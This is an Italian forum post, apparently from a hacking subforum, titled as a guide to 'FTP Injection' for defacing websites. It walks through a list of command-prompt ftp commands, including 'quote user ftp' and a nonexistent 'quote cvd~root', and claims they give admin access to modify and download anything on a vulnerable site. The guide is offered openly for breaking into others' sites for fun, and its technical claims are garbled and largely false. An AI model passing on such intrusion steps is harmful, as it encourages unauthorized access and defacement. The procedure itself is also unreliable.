• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida [DEFACE] FTP Injection

LulzSec

Utente Assiduo
Autore del topic
9 Ottobre 2009
778
0
Miglior risposta
0
Salve a tutti; mancavo da tanto e ho detto perchè non postare una semplice guida per apprendere e magari divertirsi un po'? Ci sono svariati metodi per entrare come admin in un sito vulnerabile, oggi spiegherò un metodo semplice per violare un sito web con falle inerenti al nostro metodo. Useremo il FTP Injection.

FTP Injection:

  • Trovare il sito vulnerabile
  • Aprire il Prompt dei comandi
  • Appena il Prompt dei comandi si apre seguite in ordine le cose da digitare:
    - ftp
    - open
    - ftp.sitovulnerabile.it
    - ftp.sitovulnerabile.it
    - [Alla fase inserire PASSWORD]; premere invio
    - quote user ftp
    - quote cvd~root (Se riesce a connetterti con questo comando significa che il sito è ormai bucato)
    - quote pass ftp
    - dir
  • Aprire la nostra pagina di internet e nella barra degli indirizzi inseriamo: ftp.sitovulnerabile.it

Screen del terminale.
2yy8n6w.jpg

Et voilà, siete entrati come admin e potrete modificare a vostro piacimento e scaricare qualunque cosa dal sito, tale metodo ovviamente funziona su siti con falle enormi quanto delle "case" e quindi raramente viene usato.